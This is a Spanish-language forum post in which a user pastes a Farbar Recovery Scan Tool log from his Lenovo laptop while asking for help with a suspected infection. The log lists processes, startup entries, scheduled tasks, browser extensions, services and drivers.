Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo(mas de 50.000 caracteres aprox.).

Un saludo

Muchas gracias de nuevo Daniela por tu gran ayuda.

Paso a pegar los informes de FRST.

Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 10-05-2020 01
Ejecutado por Javi (administrador) sobre LAPTOP-IUVNOHHJ (LENOVO 80ST) (10-05-2020 11:54:43)
Ejecutado desde C:\Users\Javi\Downloads
Perfiles cargados: Javi
Platform: Windows 10 Home Versión 1909 18363.778 (X64) Idioma: Español (España, internacional)
Navegador predeterminado: FF
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe
(Conexant Systems, Inc.) [Archivo no firmado] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe
(Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
(Huawei Technologies Co., Ltd. -> ) [Archivo no firmado] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo -> Lenovo Group Ltd.) C:\Program Files (x86)\Lenovo\VantageService\3.2.93.0\LenovoVantageService.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.CompanionApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.SettingsApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.CompanionApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\Connect2+\Connect2+.Service.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12004.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\CastSrv.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeSH.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\schtasks.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1911.3-0\MsMpEng.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe <12>
(Realtek Semiconductor Corp -> ) C:\Program Files (x86)\Realtek\Realtek Bluetooth\SkypePlugin.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor Corp.) C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTDevMgr.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor Corporation) C:\Program Files (x86)\Realtek\Realtek Bluetooth\AvrcpService.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor Corporation) C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTServer.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> )
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\Run: [com.squirrel.WhatsApp.WhatsApp] => C:\Users\Javi\AppData\Local\WhatsApp\Update.exe [2253232 2020-04-30] (WhatsApp, Inc -> )
HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [22245560 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GV LicenseManager.lnk [2020-02-07]
ShortcutTarget: GV LicenseManager.lnk -> C:\Program Files\Grass Valley\GV LicenseManager\AppMaintainer.exe (Grass Valley K.K. -> Grass Valley K.K.)
GroupPolicy: Restricción ? <==== ATENCIÓN
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {0F411D88-723C-4F28-8685-BAC4A63290B7} - System32\Tasks\HPCustParticipation HP Deskjet 1050 J410 series => C:\Program Files\HP\HP Deskjet 1050 J410 series\Bin\HPCustPartic.exe [4119656 2012-10-02] (Hewlett Packard -> Hewlett-Packard Co.)
Task: {1EA1B91E-BC3E-43DE-8ACC-99EF0963A0BF} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\054268cf-ccd7-4297-a750-7aa0dd342427 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [80536 2020-02-11] (Lenovo -> Lenovo Group Ltd.)
Task: {21A83433-642B-48E4-80B3-F81CD48A950F} - System32\Tasks\adobe acrobat update task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1242704 2020-02-25] (Adobe Inc. -> Adobe Systems)
Task: {23016093-263A-416E-B98F-2D36A075C7EB} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\f108d015-a0d8-4cd3-ab7e-ac895fe7798d => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [80536 2020-02-11] (Lenovo -> Lenovo Group Ltd.)
Task: {242B0A1C-5DEF-410A-B2C7-F6C4851C27F4} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {3B173085-8319-496B-8606-9FCC93F07DD9} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\307983b2-9649-4501-9624-db6bae419473 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [80536 2020-02-11] (Lenovo -> Lenovo Group Ltd.)
Task: {4B34E5DF-4330-4888-B4CD-FD9B1199CF4E} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [68280 2019-08-08] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {51C37483-9BA3-4E6E-95F0-4D9BA4A7CFB8} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23772528 2020-04-28] (Microsoft Corporation -> Microsoft Corporation)
Task: {524E9399-9B6C-4E24-AFE4-61BE0B7790B1} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61112 2019-08-08] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {579E3B06-BD7D-4D7F-9E77-2EC8B4357E43} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-290510076-2018776080-814419295-1001 => C:\Users\Javi\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe
Task: {5A4A877A-052A-4A50-B079-700C2D81D53F} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [468992 2019-08-09] (Advanced Micro Devices, Inc.) [Archivo no firmado]
Task: {5B214E30-7AC0-43C9-A55F-3A49AB51E357} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758984 2020-01-08] (Lenovo -> )
Task: {5B33EEAB-F9EE-4898-9662-FF91D8D23EE2} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18227896 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {603DDCEC-C93B-43E0-A5B8-651E10D2E694} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [124776 2020-05-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {609B21D2-4959-470A-A4D2-8EC589B3A1C5} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [124776 2020-05-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {6D26C0E1-2BBC-4CC1-A9DC-14813EDFD029} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758984 2020-01-08] (Lenovo -> )
Task: {76B3E303-1C06-44BF-960F-B1A21A3F6290} - System32\Tasks\Nero\Nero Info => C:\Program Files (x86)\Common Files\Nero\Nero Info\NeroInfo.exe [6592376 2016-11-24] (Nero AG -> Nero AG)
Task: {81782106-F914-4CEB-805B-18888DF895CF} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWoW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-04-19] (Adobe Inc. -> Adobe)
Task: {8271175D-B4E9-4430-AE5B-A4D761969087} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [158648 2020-03-31] (Lenovo -> Lenovo Group Ltd.)
Task: {869F44A2-BF4E-415F-A19B-F5F1131C450A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4357016 2020-05-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {87B6661E-581C-4C4A-B2B7-5366590446B7} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [54424 2020-02-11] (Lenovo -> Lenovo Group Ltd.)
Task: {91AA2E2F-0D14-4BB5-9DC7-93753A6B13F4} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {9ECE2419-E487-4BEE-A600-9A227F2C4554} - \Microsoft\Windows\UNP\RunCampaignManager -> Ningún archivo <==== ATENCIÓN
Task: {B3D307B7-AD5B-4F66-B102-B56608F050F6} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService
Task: {BA123A31-C2BE-45C6-9BE5-F0863B593E8B} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23772528 2020-04-28] (Microsoft Corporation -> Microsoft Corporation)
Task: {C5C037F1-2897-4DD7-8636-DCB1D7D8CD9E} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_363_Plugin.exe [1458232 2020-04-19] (Adobe Inc. -> Adobe)
Task: {CE8546E6-A1F5-4022-A743-F799F27BE543} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\a92f4d42-810c-4e50-bbdb-6f522bc58e6e => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [80536 2020-02-11] (Lenovo -> Lenovo Group Ltd.)
Task: {D1BC4ADD-1AAC-4278-9981-39E692EE2A17} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler  /v start /t reg_dword /d 1 /f /reg:32
Task: {D6FBF37D-362E-428E-B47A-566C53AB3590} - System32\Tasks\Mozilla\Firefox Default Browser Agent E7CF176E110C211B => C:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe [127176 2020-05-09] (Mozilla Corporation -> Mozilla Foundation)
Task: {ECC7026E-E276-4213-B9B4-3B0285B4A09F} - System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance => %systemroot%\system32\sc.exe start LenovoVantageService
Task: {F273A284-240D-4492-91A6-38C7F1F06BA2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4357016 2020-05-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {FB45F6B7-9EC5-4838-9762-E280409D6E1B} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [468992 2019-08-09] (Advanced Micro Devices, Inc.) [Archivo no firmado]

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 8.8.4.4 8.8.8.8
Tcpip\..\Interfaces\{115595e1-0ec7-4414-a93f-f807606ec6ab}: [DhcpNameServer] 80.58.61.250 80.58.61.254
Tcpip\..\Interfaces\{94fc0d0e-59d0-4a1c-946b-6bc05e6cc7b9}: [DhcpNameServer] 8.8.4.4 8.8.8.8
Tcpip\..\Interfaces\{9588970e-0e6a-4689-8df5-b9ea944864f0}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{c691cd92-34d4-4658-9cda-fe59099ec7c2}: [DhcpNameServer] 80.58.61.250 80.58.61.254

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-ff2033b4
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo15.msn.com/?pc=LCTE
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKLM -> DefaultScope {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM -> {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM-x32 -> {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKU\S-1-5-21-290510076-2018776080-814419295-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-290510076-2018776080-814419295-1001 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-01-12] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-01-12] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_241\bin\ssv.dll [2020-01-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-01-17] (Oracle America, Inc. -> Oracle Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-05-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-05-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-05-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-05-03] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qwagr2af.default-1539189531436
FF ProfilePath: C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436 [2020-05-10]
FF Homepage: Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436 -> hxxps://www.msn.com/
FF NewTab: Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436 -> hxxp://www.bing.com/?pc=COSP&ptag=D032219-N0600AD26CBEB7DD&form=CONMHP&conlogo=CT3335811
FF NetworkProxy: Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436 -> hxxps://web.wallapop.com; hxxps://www.planetadocumental.com; hxxps://my.jdownloader.org; hxxps://www.travelclub.es; hxxps://www.tiempo.com; hxxps://correo.chguadalquivir.es; hxxps://gcx.aliexpress.com; hxxps://sede.dipujaen.es; hxxps://lodder.club; hxxps://www.loteriasyapuestas.es; hxxps://forospyware.com
FF Extension: (anonymoX) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2019-12-18]
FF Extension: (Avast SafePrice | Comparaciones, ofertas y cupones) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2020-05-04]
FF Extension: (uBlock Origin) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2020-02-07]
FF Extension: (Avast Online Security) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2020-05-04]
FF Extension: (Video DownloadHelper) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-03-30]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_363.dll [2020-04-19] (Adobe Inc. -> )
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_363.dll [2020-04-19] (Adobe Inc. -> )
FF Plugin-x32: @fxinteractive.com/fxplanet -> C:\ProgramData\FXWebPlayer\npfxplanet.dll [2020-04-28] (FX Interactive -> FX Interactive)
FF Plugin-x32: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files (x86)\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-01-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files (x86)\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-01-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-12-07] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-01-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-05] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-03-06] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-290510076-2018776080-814419295-1001: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\Users\Javi\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll [2011-11-15] (RocketLife -> RocketLife, LLP)

==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S3 AMD External Events Utility; C:\WINDOWS\System32\DriverStore\FileRepository\c0345604.inf_amd64_696434cec9d1e3aa\B345674\atiesrxx.exe [508840 2019-08-12] (Advanced Micro Devices, Inc. -> AMD)
R2 AvrcpService; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\AvrcpService.exe [41176 2015-03-02] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation)
R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [125144 2016-02-15] (Realtek Semiconductor Corp -> Realtek Semiconductor Corp.)
R2 c2psvc; C:\Program Files (x86)\Lenovo\Connect2+\Connect2+.Service.exe [299336 2017-06-14] (Lenovo -> Lenovo)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [10610544 2020-04-28] (Microsoft Corporation -> Microsoft Corporation)
R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [Archivo no firmado]
S2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
R2 GDCAgent; C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe [1210352 2016-03-22] (LENOVO -> Lenovo)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2019-12-27] (Huawei Technologies Co., Ltd. -> ) [Archivo no firmado]
R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [80536 2020-02-11] (Lenovo -> Lenovo Group Ltd.)
R2 LenovoVantageService; C:\Program Files (x86)\Lenovo\VantageService\3.2.93.0\LenovoVantageService.exe [18696 2020-03-10] (Lenovo -> Lenovo Group Ltd.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [6933272 2020-05-08] (Malwarebytes Inc -> Malwarebytes)
R2 RtkBtManServ; C:\WINDOWS\RtkBtManServ.exe [709168 2019-05-20] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
R2 SAService; C:\WINDOWS\system32\SAsrv.exe [431960 2015-09-15] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [267352 2017-03-23] (Synaptics Incorporated -> Synaptics Incorporated)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\NisSrv.exe [3206472 2019-12-08] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\MsMpEng.exe [103376 2019-12-08] (Microsoft Windows Publisher -> Microsoft Corporation)
U3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
U3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S3 amdkmcsp; C:\WINDOWS\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0345604.inf_amd64_696434cec9d1e3aa\B345674\atikmdag.sys [60438464 2019-08-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0345604.inf_amd64_696434cec9d1e3aa\B345674\atikmpag.sys [598440 2019-08-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [103456 2019-08-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdpsp; C:\WINDOWS\System32\DRIVERS\amdpsp.sys [138544 2019-08-21] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc. )
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [108152 2019-07-24] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2019-09-12] (Microsoft Corporation) [Archivo no firmado]
R3 BthAudioHF; C:\WINDOWS\system32\drivers\RtkHfp.sys [116224 2017-03-27] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 BthMtpEnum; C:\WINDOWS\System32\drivers\BthMtpEnum.sys [71680 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
R1 dokan1; C:\WINDOWS\System32\DRIVERS\dokan1.sys [104312 2018-08-09] (D3L -> Dokan Project)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2018-10-22] (Huawei Technologies Co., Ltd.) [Archivo no firmado]
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [214496 2020-05-08] (Malwarebytes Inc -> Malwarebytes)
